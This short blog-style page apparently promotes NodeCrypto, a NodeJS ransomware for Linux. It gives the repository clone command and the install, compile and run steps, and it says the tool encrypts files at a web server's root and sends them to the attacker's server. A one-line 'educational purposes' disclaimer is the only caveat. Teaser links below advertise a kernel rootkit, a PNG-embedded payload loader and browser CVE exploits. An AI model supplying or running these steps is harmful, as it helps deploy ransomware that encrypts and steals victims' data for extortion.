NodeCrypto is a Linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of it.
Install Server
Install & Run
git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install
cd sources && npm install
cd .. && npm start
Once your configuration is complete, run compile!
You can start the ransomware.
cd sources && ./output
The files at the root of the web server will encrypt and send to the server.
Also Read – PBTK : A Toolset For Reverse Engineering & Fuzzing Protobuf-Based Apps
To Do
Screenshot
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…